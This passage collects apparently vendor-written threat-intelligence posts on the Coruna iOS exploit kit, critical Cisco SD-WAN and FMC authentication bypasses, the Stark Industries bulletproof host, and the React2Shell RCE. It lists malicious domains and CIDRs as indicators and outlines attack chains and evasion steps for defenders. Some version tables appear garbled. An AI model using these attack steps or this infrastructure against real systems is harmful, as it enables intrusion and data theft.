a Corellium virtualized iOS environment and removes crashlogs from previous exploitation attempts involving WebContent, powerd, and kernel panics, cleaning up evidence of unsuccessful prior infections (Google, 2026; iVerify, 2026). Additional technical characteristics of the delivery framework include the following: resources are referenced by hash values derived from a unique hardcoded cookie. Binary payloads are served from URLs ending in .min.js, encrypted with ChaCha20, packaged with a custom header of 0xf00dbeef, and compressed with LZW (Google, 2026). NadSec's analysis confirmed the JavaScript modules are organized as a custom module system with SHA-1 hash identifiers and dependency resolution, and that the kit contains version-adaptive offset tables covering 41 JSC internal structure offsets across three WebKit version thresholds, indicating systematic access to multiple WebKit builds during development (NadSec, 2026).UNC6691's use of fake cryptocurrency exchange sites serves a dual purpose. Visiting a crypto exchange indicates the visitor's potential ownership of cryptocurrency wallets, whilst visiting from an iOS device triggers immediate delivery of the exploit kit. iVerify independently identified the domain mxbc-v2[.]tjbjdod[.]cn hosting exploits, along with C2 infrastructure at aidm8it5hf1jmtj[.]xyz and uawwydy3qas6ykv[.]xyz (iVerify, 2026). NadSec's analysis additionally documents b27[.]icu as a watering hole domain serving the Safari exploit chain (NadSec, 2026).Operation ModelUNC6691 is a financially motivated threat actor operating from China. Unlike the earlier, highly targeted use of Coruna by UNC6353 against specific Ukrainian users, UNC6691 operates with a broader and less selective scope. The actor deployed the Coruna exploit kit across fake websites impersonating cryptocurrency exchanges, financial platforms, gambling sites, and pornography sites (Google, 2026; iVerify, 2026). This breadth of lure categories indicates UNC6691's intent to maximize the volume of compromised devices rather than pursue specific individuals.The broader proliferation pattern is notable; the Coruna exploit kit moved from a commercial surveillance vendor's customer to a suspected Russian espionage group, UNC6353, and then to UNC6691. How this proliferation occurred is unclear but suggests an active market for secondhand zero day exploits (Google, 2026). The exploit market's role in proliferation has recent precedent. Australian national Peter Williams, a former executive at L3Harris subsidiary Trenchant, was sentenced to 87 months on 25 February 2026 for stealing at least eight of the company's exploits and selling them to a Russian broker believed to be associated with Operation Zero, which was subsequently sanctioned by the US Treasury Department the same week (Nextgov/FCW, 2026; NadSec, 2026).The spyware market operates with minimal regulatory oversight, and once an exploit capability is sold, the original developer has no control over how it is subsequently used or redistributed. This dynamic mirrors the 2017 EternalBlue incident, where an NSA-developed Windows exploit was stolen and subsequently weaponized in the WannaCry and NotPetya attacks. Coruna follows the same pattern, now playing out on mobile devices (iVerify, 2026).The Coruna exploit kit is not effective against the latest version of iOS. A portion of the exploit chain was patched with iOS 17.3. Updating to the most current iOS version is the primary mitigation, with Lockdown Mode recommended where an update is not possible (Google, 2026).Centripetal’s PerspectiveThe traffic observed across international academic and government entities indicates that devices or users within these environments attempted to reach infrastructure directly tied to UNC6691's Coruna campaign and PLASMAGRID C2 operations. The majority of this traffic was shielded, which prevented the exploit delivery and C2 communication from completing. The domain 8fn4957c5g986jp[.]xyz, observed in the traffic, is consistent with this campaign’s DGA pattern. iphonex[.]mjdqw[.]cn communications serve as an exploit kit delivery endpoint for UNC6691. Given that the malware exfiltrates photographs, emails, and Apple Notes content in addition to cryptocurrency wallet data, the potential impact of a successful compromise extends beyond financial theft.Organizations with traffic to this domain should review endpoint logs and confirm iOS patch levels on any devices that may have accessed it. iVerify's technical analysis provides specific forensic indicators that can assist in determining compromise, including the presence of the file com.apple.photolibraryd.plist in the device's preferences directory, evidence of the infection URL in Safari browser history, and anomalous network activity from the powerd and imagent processes in data usage logs. These artifacts can be observed across device restarts and are accessible through encrypted iTunes backups (iVerify, 2026).Figure Three: Threat Intelligence Coverage from Multiple Threat Intel providers and Feeds since January 2026The concentration of this activity across education and government verticals is consistent with the broad, non-targeted delivery model described for this phase of the campaign, where any iOS device visiting the attacker-controlled sites would receive the exploit kit regardless of geolocation. This has been characterized as the first observed mass exploitation of iOS devices by a criminal group, marking a shift from the highly targeted deployment model historically associated with nation-state-grade exploit kits (iVerify, 2026).The Coruna exploit kit represents a convergence of several concerning trends in the threat landscape: the proliferation of nation-state-grade capabilities to financially motivated actors, the commodification of iOS zero day chains through an under-regulated exploit brokerage market, and the resulting shift from targeted espionage deployment to indiscriminate mass exploitation. The traffic observed in Centripetal's customer environments across education and government sectors confirms that this campaign's reach extends to organizational verticals where device management and iOS patching may not be uniformly enforced.The technical sophistication of the Coruna framework is substantial. The kit's five exploit chains cover nearly every iPhone model released over a four year period, and NadSec's independent reverse engineering of the JavaScript source reveals engineering quality consistent with professional development: version-adaptive offset tables, retry mechanisms, fallback exploit paths, and a PAC bypass technique that exploits a design level gap between control flow and data flow protections that software updates alone cannot fully address. The addition of CVE-2023-41974 to the CISA KEV catalogue on March 7, 2026, with its March 26th remediation deadline, reinforces the urgency of patching and establishes a federal compliance requirement for affected organizations.The proliferation path from commercial surveillance vendor to Russian espionage group to Chinese criminal actor illustrates the lifecycle risk inherent in offensive exploit development. The sentencing of Peter Williams for selling stolen exploits to a sanctioned Russian broker provides a concrete link between exploit theft and the downstream harms observed in this campaign. Once a capability of this calibre enters the secondary market, the original developer's control over targeting, scope, and restraint is permanently lost.For organizations with traffic to the identified infrastructure, the immediate priorities are confirming iOS patch levels across all managed devices, reviewing endpoint and network logs for the forensic indicators detailed in this report, and restarting any potentially affected devices as an interim remediation measure. The PLASMAGRID DGA pattern and the expanding set of delivery domains, now including b27[.]icu alongside the previously documented UNC6691 infrastructure, should be incorporated into network monitoring and blocking rules. Both Google and iVerify have indicated that further technical analysis will be published, and this finding should be revisited as additional details emerge.IOCsIndicatorTypeContextmxbc-v2[.]tjbjdod[.]cnDomainExploit kit delivery endpoint operated by UNC6691 (iVerify)iphonex[.]mjdqw[.]cnDomainExploit kit delivery endpoint for UNC6691 (Centripetal)b27[.]icuDomainWatering hole domain serving Safari exploit chain (NadSec)aidm8it5hf1jmtj[.]xyzDomainPLASMAGRID C2 infrastructure (iVerify)uawwydy3qas6ykv[.]xyzDomainPLASMAGRID C2 infrastructure (iVerify)8fn4957c5g986jp[.]xyzDomainDGA-generated domain consistent with PLASMAGRID pattern (Centripetal)Resourceshttps://iverify.io/press-releases/first-known-mass-ios-attackhttps://www.securityweek.com/nation-state-ios-exploit-kit-coruna-found-powering-global-attacks/https://mezha.ua/en/news/coruna-russian-hackers-309111/amp/https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kithttps://404-founders.com/blog/coruna-how-your-iphone-can-be-hacked-without-a-click-and-how-to-protect-yourselfhttps://iverify.io/blog/coruna-inside-the-nation-state-grade-ios-exploit-kit-we-ve-been-trackinghttps://www.nadsec.online/blog/coruna#article --- ### [Critical Cisco Vulnerabilities Target the Network Edge](https://www.centripetal.ai/threat-research/critical-cisco-vulnerabilities-target-the-network-edge) Published: 2026-03-06 Summary: Critical Cisco vulnerabilities CVE-2026-20127 and CVE-2026-20079 enable authentication bypass and full system compromise. Learn the risks, attack chain, and mitigation steps. Cisco has disclosed multiple critical vulnerabilities affecting core network management infrastructure including CVE-2026-20127 and CVE-2026-20079. CVE-2026-20127 impacts Cisco Catalyst SD-WAN (formerly Viptela) enabling attackers to bypass authentication mechanisms within the SD-WAN control plane. While CVE-2026-20079 affects Cisco Secure Firewall Management Center (FMC) and allows authentication bypass that can lead to full system compromise.Both vulnerabilities target systems responsible for network orchestration and security policy management, meaning successful exploitation could provide attackers with broad visibility and control across enterprise environments. The targeting of these platforms reflects a broader trend: edge and control-plane infrastructure continues to be a high-value entry point for advanced threat actors, particularly when authentication controls can be bypassed remotely.Overview CVE-2026-20127A series of critical vulnerabilities had been disclosed affecting the Cisco Catalyst SD-WAN ecosystem. These vulnerabilities facilitate unauthenticated, remote attack chains that bypass peering authentication mechanisms can gain administrative control over the SD-WAN fabric. Five eyes intelligence agencies have issued advisories indicating nation-state actors and the threat actor UAT-8616 have been exploiting the flaw since 2023 to establishing footholds within government and corporate environments.Vulnerability Type (CWE)CWE-287: Improper Authentication CWE-287 occurs when an application incorrectly verifies the identity of a user, allowing attackers to bypass authentication or assume the privileges of other accounts.Figure One: CWE-287 Visualisation (CWE MITRE, 2024)CVSS ScoreBase Score: 10Attack Vector: Network (N)Attack Complexity: Low (L)Privileges Required: None (N)User Interaction: None (N)Scope: Changed (C)Confidentiality: High (H)Integrity: High (H)Availability: High (H)Mitigation StepsThere are no workarounds that address this vulnerability. (Cisco, 2026) To ensure complete protection against these vulnerabilities and prevent future exploitation, Cisco emphasizes that customers must transition to the specific fixed software releases as outlined below. 💡 Priority Check If you are running a version marked as End of Maintenance, your device is not only vulnerable to CVE-2026-20127 but will also lack future security parity. Prioritise these migrations first. Current Affected VersionStatusRecommended Fixed ReleasePrior to 20.9End of MaintenanceMigrate to a supported fixed release (e.g., 20.9.8.2+)20.9Supported20.9.8.220.11End of MaintenanceMigrate to 20.12.6.120.12.5Supported20.12.5.320.12.6Supported20.12.6.120.13End of MaintenanceMigrate to 20.15.4.220.14End of MaintenanceMigrate to 20.15.4.220.15Supported20.15.4.220.16End of MaintenanceMigrate to 20.18.2.120.18Supported20.18.2.1Affected deployment types include:On-PremisesCisco Managed (Cloud)Cisco FedRAMP (Cloud)Cisco SD-WAN CloudAttack ChainUAT-8616 uses a multi-stage attack chain designed for maximum stealth:Reconnaissance Identify internet-exposed Catalyst SD-WAN Manager or Controller interfaces.Initial Access (CVE-2026-20127) Exploit the peering authentication flaw via crafted requests to obtain a high-privileged, non-root user account.Privilege Escalation (Version Downgrade) Downgrade software to a version vulnerable to CVE-2022-20775 (a local privilege escalation flaw) to gain root access.Persistence Install persistent backdoors after achieving root access, then restore the original software version to hide evidence of the downgrade.Fabric Expansion Deploy rogue peers to maintain a permanent, encrypted presence in the network fabric.Detection StrategyDetection is challenging because actors frequently clean logs. Prioritize the following:Audit Control Connections Run show control connections and investigate any System IP or Serial Number that doesn't match your inventory.Log Anomalies Search /var/log/auth.log for successful logins from unexpected external IPs, specifically those linked to vmanage-admin or other high-privileged roles.Unexpected Reboots Analyze /var/volatile/log/vdebug for evidence of unplanned reboots or software synchronization scripts (sw_script_synccdb.log) that indicate a version swap.IPS Signatures Monitor for Snort/IPS triggers “SERVER-OTHER TRUFFLEHUNTER SFVRT-1058 attack attempt“Hardening Guidance from CiscoPhase 1: Assess for IntrusionShould exploitation have taken place, it is strongly advised that prior to applying patches, perform forensic preservation to ensure evidence of this exploitation is not deleted.Forensic Collection Capture snapshots of SD-WAN Manager/Controller instances and export all logs (/var/log/vsyslog, auth.log, and /var/log/nms).Compromise Assessment Audit show control connections for unrecognized Serial Numbers and review the Statistics Database for unexpected configuration changes.Patch Deployment Update to a fixed release (as refenced above). Patching the Manager and Controller remediates the core authentication bypass (CVE-2026-20127).Phase 2: Network Perimeter & Access ControlRestrict the reachability of the management and control planes to authorized entities only.CategoryMitigation ActionManagement IsolationMove VPN 512 (Management) to a strictly Out-of-Band (OOB) network. Never expose ports 443, 22, or 830 to the internet.Control Plane SecurityUse ACLs to restrict UDP 12346 (DTLS) and TCP 23456 (TLS) to known Edge IP ranges.Jump HostsEnforce access to SD-WAN Manager only through a hardened Jump Host protected by MFA (e.g., Duo).Cisco-Hosted RulesUse the SD-WAN Portal to define specific Inbound Rules; avoid "ALL" source IP rules.Phase 3: Identity and Authentication HardeningTransition away from weak local credentials to centralized, multi-factor identity management.Implement RBAC Move away from the netadmin role for daily tasks. Assign operator, network_operations, or security_operations based on the principle of least privilege.Enforce MFA/SSO Integrate SD-WAN Manager with an Identity Provider (SAML/Okta/Azure AD) or enable native Duo MFA.Password Policy Configure "High Security" password criteria (15–32 characters, 8-character change delta). Update default configuration database credentials.SSH Security Use RSA Keys (2048-4096 bit) instead of passwords. Disable weak algorithms (SHA-1, AES-128) via SD-WAN Manager templates.Phase 4: Data Plane & Logging IntegrityEnsure the fabric remains resilient and activity is auditable.Encrypted Fabric Maintain AES-GCM-256 for overlay tunnels. Use IPsec Pairwise Keys with ECDH P-384 for superior key exchange security.Session Management Set the Server Session Timeout to the minimum viable duration (default 30 mins) and configure CLI idle-timeout (e.g., 10 minutes).Centralized Logging Forward all logs to a remote Syslog/SIEM using TLS transport.Audit Retention Use the SD-WAN Manager API to estimate storage needs and expand the Audit Logs buffer (add a 20% buffer for growth) to meet compliance requirements.Phase 5: Maintenance and VerificationWeb Certificates Replace default self-signed UI certificates with those signed by an Enterprise or Public CA.SNMPv3 Disable SNMPv1/v2; enforce SNMPv3 with authentication and privacy (AES/SHA).Regular Audits Periodically rotate SSH keys and administrative passwords, especially after an incident or staff offboarding.Overview CVE-2026-20079CVSS ScoreBase Score: 10Attack Vector: Network (N)Attack Complexity: Low (L)Privileges Required: None (N)User Interaction: None (N)Scope: Changed (C)Confidentiality: High (H)Integrity: High (H)Availability: High (H)As of March 4th , Cisco has issued an additional critical security advisory referring to a severe authentication bypass vulnerability in their Secure Firewall Management Center (FMC) Software. CVE-2026-20079 has a CVSS Score of 10 (Critical) and could allow for a threat actor to bypass authentication, leading to full root access to the underlying operating system. This vulnerability originates from an improper system process activated at device boot. An attacker can exploit this vulnerability by sending crafted HTTP requests to a vulnerable device, allowing them to execute scripts and commands, gain privileged access and alter configurations. There are no advised workarounds issued for this CVE, immediate patching of affected devices is required. If unsure of whether a utilised Cisco product is affected by this vulnerability, Cisco customers are recommended to use the Cisco Software Checker tool to measure exposure.Centripetal’s PerspectiveCentripetal’s Velaris team continue to track and defend against threats like CVE-2026-20127 and CVE-2026-20079 for our customers. Consolidated threat intelligence deployed to protect our customers from the continued targeting and exploitation of edge devices, ensure that the intelligence gap is closed tighter.High-severity zero-days and edge device exploitation are not new techniques, they continue to represent high-value initial access vectors for many threat actors. This CVE underscores the necessity of a defense-in-depth security strategy to ensure environments are secure, particularly those at the perimeter that have significant control and potential detrimental impact should they be compromised.UPDATE:Since the drafting of this publication Cisco has warned of 2 further vulnerabilities under active exploitation affecting Catalyst SD-WAN Manager. (Cisco, 2026)CVE-2026-20122 represents a high-severity arbitrary file overwrite risk, carrying a CVSS score of 7.1. This flaw allows a remote attacker who has already secured read-only credentials to exceed their intended permissions via API access. By exploiting this vulnerability, the attacker can replace or corrupt critical files on the local file system, potentially leading to system instability or unauthorized configuration changes.CVE-2026-20128 is an information disclosure vulnerability with a CVSS score of 5.5 that facilitates lateral movement. In this scenario, an authenticated local attacker with standard vManage credentials can exploit the system to escalate their permissions. Successful exploitation allows the attacker to gain Data Collection Agent (DCA) user privileges, granting them access to data and system functions that should otherwise be restricted to higher-level service accounts.Affected Version PathRecommended Fixed ReleaseEarlier than 20.91Migrate to a fixed release (see below)Version 20.920.9.8.2Version 20.1120.12.6.1Version 20.1220.12.5.3 or 20.12.6.1Version 20.1320.15.4.2Version 20.1420.15.4.2Version 20.1520.15.4.2Version 20.1620.18.2.1Version 20.1820.18.2.1Resourceshttps://nvd.nist.gov/vuln/detail/CVE-2026-20127https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZkhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2CVE-2026-20079 | Tenable®https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v#:~:text=Exploitation and Public Announcementshttps://thehackernews.com/2026/03/cisco-confirms-active-exploitation-of.html --- ### [Insights into the Persistence and Resilience of Bulletproof Hosting: A Case Study on Stark Industries Solutions](https://www.centripetal.ai/threat-research/insights-into-the-persistence-and-resilience-of-bulletproof-hosting-a-case-study-on-stark-industries-solutions) Published: 2026-01-05 Summary: Bulletproof hosting providers, like Stark Industries Solutions Ltd., enable cybercriminals to operate with impunity by ignoring abuse complaints and regulations, thereby facilitating malicious… A bulletproof host is a web hosting provider who, through a lassiez-faire approach to malicious activity, enables cybercriminals to continue operating. They do not directly carry out cyber-attacks; however, they provide the underlying infrastructure and look the other way, ignoring regulation and complaints. Researchers claim that the most effective way of defending against such providers is to identify those with the highest risk profile and block them, using threat intelligence and active behavioral tracking aligned to the specific environment. This research examines the world of bulletproof hosting and applies Stark Industries Solutions Ltd. as a real-world example to illustrate the threat posed by, and the resilience of, bulletproof hosting providers.Bulletproof Hosting: An OverviewWhat is BPH?Internet Service Providers (ISPs) act as a channel to reach the internet and share content with the world. Operating this service comes with influence and responsibility, and in the context of cybersecurity, ISPs play a major role in investigating and preventing malicious activity. Users can submit abuse complaints against content hosted by ISPs, resulting in investigation and mitigating actions. Some legislation holds ISPs accountable for what they host, such as the Digital Services Act in the EU. Bulletproof Hosting (BPH) refers to web hosting providers who disregard regulation, ignore abuse complaints and are publicly known to be lenient with the content they serve, making them an attractive place for threat actors to conduct malicious activity.Ignoring abuse complaints gives threat actors the confidence that an attack can be carried out before action is taken — or that it may not be stopped at all. BPHs often carefully choose the kind of illegal activity they allow and will locate themselves in regions with less capacity to regulate and sanction this activity, building their reputation along the way. Complex technical configurations also create difficulties in reporting abuse, such as rapidly changing IPs associated with domains. A concerning trend observed recently by Silent Push sees threat actors using multiple BPH providers to ensure continuity of attack infrastructure and campaigns.The most effective way of defending against BPH providers is to proactively use threat intelligence to monitor their activity and block those positively identified in real-time. The decision to block all traffic coming from a BPH is a subjective one, that relies on the specific business and operational context of a specific organization. This means one cannot simply block all known BPH providers, as some host legitimate services that may be business critical. However, research suggests some general guidelines and characteristics which assist in mapping BPHs and determining the risk associated with a web hosting service, outlined below.How Do You Identify a Bulletproof Host?The first step in tracking and mapping BPHs is being able to identify them. Previous research highlights key characteristics possessed by BPHs, and they include the following:Anonymised Payments: Often BPH providers will request methods of payment which hide the identities involved in the transaction and are difficult to trace, like cryptocurrency such as Bitcoin or Ethereum.Delayed Abuse Response Times: BPHs will typically ignore or elongate the abuse complaint process as they are aware of and allow malicious activity to be conducted using their infrastructure. Even if a response is eventually made to a complaint, the threat actor will have had time to carry out a full attack, making the investigation pointless.Domain Generating Algorithms: Domains belonging to a BPH will often have been generated algorithmically.BPH Language: BPHs will sometimes clearly state that they are a BPH — and in many cases that declaration should be taken at face value. Common language used includes phrases like ‘DMCA ignored hosting’, which relates to US legislation on copyright.Lack of Business Attributes: Some BPHs lack an official associated domain or a physical address, attributes that indicate legitimacy and cultivate trust of an organization.Low IP Density: Researchers at Silent Push have observed that the vast majority of known BPHs have ownership over a low IP address density.Existence of Peering Issues: Autonomous Systems (ASs) often peer with each other to allow for ease and efficiency of traffic flow across the internet, but having a reputation as a BPH leads to difficulties as many legitimate services do not want to be associated and therefore decline to peer. This topic has raised additional discussions on holding those that peer with known BPH providers more accountable, as they assist in keeping BPHs online, making them complicit in enabling malicious content.For security teams to effectively defend against BPHs they need to analyze web hosting providers against known BPH characteristics, track BPH activity in real time through use of threat intelligence, and determine the level of risk they are willing to accept within their environment. To illustrate the persistent nature of BPHs and the risks they pose, the following case study is presented on Stark Industries Solutions Ltd. The web hosting provider’s characteristics, historical activity and its recent evasive changes to infrastructure embody what it is to be a BPH.Case: Stark Industries Solutions Ltd.Who are they?Stark Industries Solutions Ltd. (AS44477), not to be confused with the Marvel universe tech giant, is a well-known BPH provider that has recently come under much scrutiny after facing sanctions from the European Union. Founded by brothers Iurie Neculiti and Ivan Neculiti, the web hosting provider offers virtual private servers (VPSs), proxies and virtual private networks (VPNs) from multiple locations. Stark Industries is incorporated in the UK, and its servers are connected through a data center in the Netherlands, using established infrastructure from other companies for operations, like MIRHosting. The organization is technically an intermediary in communications with PQ Hosting, the parent company, acting as a layer of obfuscation for malicious activities. It is evident from the services they offer, their low-price range ,and payment through cryptocurrency, that the BPH is enabling anonymity and malicious activity. Threat actors such as NoName057(16), FIN7 and GrayAlpha have all been observed utilising Stark Industries’ infrastructure for their campaigns.Researchers from the Recorded Future Insikt Group classify Stark Industries as a Threat Activity Enabler (TAE). A TAE is an organization whose assets and services are continuously used by malicious actors; therefore, they are often not the direct instigator of a campaign but support it through infrastructure. Some TAEs operate with awareness of the part they play and actively enable it, while others support malicious actors unconsciously, unaware of how their infrastructure is being used. It is difficult to take punitive action against TAEs as they sit in a grey area between legitimacy and illegality and are adaptable to many situations. Stark Industries is a web hosting TAE which actively evades legislation, abuses Réseaux IP Européens (RIPE) resources, and assists threat actors in their campaigns. Stark Industries’ categorization as a conscious TAE is highlighted by its historical and current activity.Historical Activity and Threat EnablementStark Industries emerged approximately two weeks prior to the Russian invasion of Ukraine in 2022, followed by the launch of targeted Distributed Denial of Service (DDoS) attacks against the UK and Europe, allies of the Ukrainian forces. Since this time, the BPH’s infrastructure has supported many Russian state-sponsored attacks along with disinformation campaigns. The technical configuration of this infrastructure makes it difficult to trace, attribute and prosecute, giving rise to European Union (EU) sanctions on Stark Industries itself.Stark Industries has also been linked to the resurfacing of threat actor FIN7 in 2024. FIN7 has used Stark Industries domains to conduct attacks such as phishing and typosquatting, usually with a landing page that resembles one of a legitimate service like Microsoft and by taking advantage of older domains to bypass security controls conditioned on newly emerging domains. FIN7 hosts its command-and-control (C2) servers with the BPH provider, allowing for coordination and expansion of operations. This example of a threat actor using Stark Industries’ infrastructure demonstrates how the web hosting provider is an enabler for malicious activity, sustaining and protecting cyber-criminals online.Sanctions, Evasion, and Recent DevelopmentsAs of May 20, 2025, EU sanctions have been placed on Stark Industries and key individuals involved in its operations. These come as a response to the company’s involvement in Russian cyber activity against the EU and its allies, including enabling disinformation campaigns and providing infrastructure to threat actors carrying out attacks. The sanctions mean Stark Industries is subjected to asset freezing and provision of funding is forbidden. Additionally, the Neculiti brothers are barred from entering EU territory, even for travel purposes.The effectiveness of these sanctions, however, is being questioned by researchers as Stark Industries has been observed taking pre-emptive and evasive actions against them. Starting prior to the official announcement from the EU, Stark Industries made several infrastructural and branding changes in order to continue operations with largely no impact from sanctioning. Recorded Future has uncovered evidence that suggests the Neculiti brothers could have learned in advance that they were included in the next EU sanctions package, through a Moldovan news outlet who reported on leaked documents on May 8th and 9th, 2025. On May 13th, 2025, a new organization was created in RIPE, PQ Hosting Plus S.R.L., and three days later AS44477 (Stark Industries Solutions’ ASN) was transferred to this entity.At the end of May, PQ Hosting rebranded to THE Hosting, transferring control over all assets and resources of Stark Industries’ parent company to the new legal entity. WorkTitans B.V. was named as the organization responsible for THE Hosting, however all references to it have been removed from THE Hosting’s website. AS209847, assigned to a local internet registry named WorkTitans B.V,. was registered in late June of 2025 with RIPE. WorkTitans B.V. is classified as a recruitment company, an area with little relevance to hosting providers, making its connection to Stark Industries increasingly suspicious. The Insikt Group at Recorded Future deem this association to be another attempt by the BPH to obfuscate true activity and control, further avoiding EU sanction impact.There are signs to suggest the Neculiti brothers may have known of the sanctions earlier than the Moldovan news reports, or anticipated some punitive action from a legal perspective during the year. In April 2025, over a month prior to the sanctions package, Stark Industries began to migrate its infrastructure in Russia to UFO Hosting LLC. (AS33993). IP addresses and domains previously related to PQ Hosting and Stark Industries are now being attributed to AS33993. The transfer of Russian-based assets and resources to UFO Hosting is widely assessed to be a way for Stark industries to continue its services despite EU sanctions.Figure 1:Timeline of infrastructural changes made to Stark Industries Solutions in order to mitigate the effects of sanctions (Recorded Future, 2025)As observed above in Figure 1, from these infrastructural changes, it is clear Stark Industries continues to offer its services with little to no interruption. The now dissolved company has expanded its web of partners to include those above and, one can only assume, many more. For example, Krebs on Security mentions MIRHosting, which does not appear in sanctions but plays a role in keeping Stark Industries online. Research continues to investigate the network Stark Industries has established, with expectation of further discovery over time.Centripetal Perspective: Addressing the Risk of Bulletproof HostingCentripetal is acutely aware of the threats posed by BPHs and recognize the structural weakness they represent in the global internet ecosystem. Through our intelligence services and research teams, we continually monitor and deepen our understanding of well-known BPH infrastructure, such as Stark Industries Solutions. Our objective is to ensure relevant, current, and actionable threat intelligence is applied to customer environments as part of our CleanINTERNET service — helping prevent attacks before they ever reach the network.Pairing the largest collection of third-party threat intelligence with Centripetal Intelligence Services creates a comprehensive dataset — closing knowledge and visibility gaps that would otherwise remain unaddressed. To illustrate the value of this collaboration, we can examine the five most recently associated CIDRs with Stark Industries by BGP Tools: 104.253.158.0/24 154.205.255.0/24 104.253.165.0/24 45.38.42.0/24 23.230.101.0/24In the case of Stark Industries, Centripetal Intelligence Services have derived and deployed intelligence feeds which capture known CIDRs attributed to the BPH through related ASNs, such as AS44477. These feeds are actively monitoring and shielding traffic, where applicable to a customer’s environment, taking down any potential attack chain at the source. The CIDRs listed above are contained within such feeds, demonstrating Centripetal’s ability to monitor BPH behavior and infrastructure to provide our customers with timely, operationally-ready intelligence.Analysis of third-party threat intelligence feeds from our providers reveals only 2% coverage of the CIDRs identified by BGP Tools. This illustrates the value of pairing ingested data from external sources with Centripetal’s internal intelligence, creating the highest level of IOC coverage possible for our customers.Figure 2: Coverage given by a subset of threat intelligence providersThe above pie chart highlights that if third-party intelligence feeds alone were applied to customer environments, there would be 2.89% coverage of the defined Stark Industries CIDRs, meaning only 2.89% could be shielded on. However, Centripetal’s intelligence feeds have 100% coverage of the CIDRs, giving our customers 100% shielding potential.What This Means for DefendersEvidenced through the example of Stark Industries Solutions, BPHs pose a threat to organizations as a TAE. Connections to associated IPs/domains come with an additional risk of malicious activity. BPH characteristics and their ability to migrate quickly make them difficult to track, highlighting the need for application of real-time threat intelligence. Centripetal’s CleanINTERNET service provides this from both our internal and external intelligence sources, giving security teams the ability to analyse the risk of a given BPH to their organization, and take action on those deemed outside of the levels of risk willingly accepted. There is no doubt BPHs will continue to enable threat actors of all motives; the responsibility now lies with security and research teams to understand their exposure, determine their impact, and proactively reduce it.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Resourceshttps://www.sentinelone.com/cybersecurity-101/threat-intelligence/bulletproof-hosting/https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-servicehttps://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab/https://www.silentpush.com/webinar/webinar-bulletproof-hosting/https://krebsonsecurity.com/2024/05/stark-industries-solutions-an-iron-hammer-in-the-cloud/https://www.bleepingcomputer.com/news/security/european-union-sanctions-stark-industries-for-enabling-cyberattacks/https://dailysecurityreview.com/security-spotlight/eu-sanctions-stark-industries-and-leadership-for-supporting-russian-cyber-operations/https://www.silentpush.com/blog/fin7/#h-rented-fin7-infrastructure-stark-industrieshttps://arachnedigital.medium.com/stark-industries-fuelling-russias-cyber-offensive-a16b3fac8123https://krebsonsecurity.com/2024/07/the-stark-truth-behind-the-resurgence-of-russias-fin7/https://www.recordedfuture.com/research/one-step-ahead-stark-industries-solutions-preempts-eu-sanctionsBulletproof Host Stark Industries Evades EU Sanctions – Krebs on SecuritySearch - bgp.tools --- ### [React2Shell: Critical RCE in React Server Functions Enables Full Remote Code Execution](https://www.centripetal.ai/threat-research/react2shell-critical-rce-in-react-server-functions-enables-full-remote-code-execution) Published: 2025-12-09 Summary: A severe React2Shell RCE flaw in React Server Functions lets attackers execute code via crafted HTTP requests. This vulnerability is patched in React 19.2.1. React Server Functions was observed to have a critical remote code execution vulnerability (RCE) with a CVSS of 10.0. This RCE vulnerability has since been patched with React 19.2.1. React Server Functions facilitate remote function calls, translating client requests into server-bound HTTP requests and back into function executions. However, an unauthenticated attacker can exploit a vulnerability in this deserialization process. By sending a maliciously crafted HTTP request to any Server Function endpoint, the attacker can achieve RCE on the server. This vulnerability initially had two separate submissions, CVE-2025-55182 (known as React2Shell) and CVE-2025-66478, however CVE-2025-66478 has since been closed as a duplicate.Vulnerability Type (CWE)CWE-502: Deserialization of Untrusted DataDeserialization of client-provided data is performed without adequate validation, potentially allowing malformed or unsafe objects to be processed.Figure 2: Visualization of this CWE (MITRE, 2024)CVE-2025-55182CVSS Score: 3.1Base Score: 10 (Critical)Attack Vector: (AV:N)Attack Complexity: (AC:L)Privileges Required: (PR:N)**User Interaction: (**UI:N)Scope: (S:C)Impact on CIA:Confidentiality: High (C:H)Integrity: High (I:H)Availability: High (A:H)CVE-2025-66478Rejected by CVE as it is a duplicate of CVE-2025-55182. (CVE, 2025)Impacted VersionsPackage NameVulnerable VersionsFixed/Patched Versions (Minimum Upgrade)react-server-dom-webpack19.0, 19.1.0, 19.1.1, 19.2.0> 19.2.1react-server-dom-parcel19.0, 19.1.0, 19.1.1, 19.2.0> 19.2.1react-server-dom-turbopack19.0, 19.1.0, 19.1.1, 19.2.0> 19.2.1In addition to the Impacted Versions above there were React frameworks and bundlers affected due to their dependency structure. Specifically their direct, peer, or bundled versions of the vulnerable React packages.nextreact-routerwaku@parcel/rsc@vitejs/plugin-rscrwsdkNote that simply enabling support for React Server Components is sufficient to make an application vulnerable, regardless of whether server functions are actively used. (React, 2025)Mitigation StepsTo mitigate the Remote Code Execution (RCE) vulnerability stemming from React Server Components, apply the following package updates immediately based on the framework or tool you are using.Node.js UsersNext.js Release LineMitigation Command15.0.xnpm install next@15.0.515.0.xnpm install next@15.1.915.0.xnpm install next@15.2.615.0.xnpm install next@15.3.615.0.xnpm install next@15.4.815.5.xnpm install next@15.5.716.0.xnpm install next@16.0.7Canary ReleasesIf using Next.js 14.3.0-canary.77 or later, downgrade to the latest stable 14.x release: npm install next@14React RouterIf using React Router's unstable RSC APIs, update all related dependencies to their latest stable versions.npm install react@latest react-dom@latest react-server-dom-parcel@latest react-server-dom-webpack@latest @vitejs/plugin-rsc@latestFrameworks and Specific PackagesIf using the other affected frameworks or core packages.Affected Tool / PackageMitigation CommandExponpm install react@latest react-dom@latest react-server-dom-webpack@latestRedwood SDK (rwsdk)Ensure you are on rwsdk>=1.0.0-alpha.0. For the latest beta version and RSC dependencies: npm install rwsdk@latest npm install react@latest react-dom@latest react-server-dom-webpack@latestWakunpm install react@latest react-dom@latest react-server-dom-webpack@latest waku@latest@vitejs/plugin-rscnpm install react@latest react-dom@latest 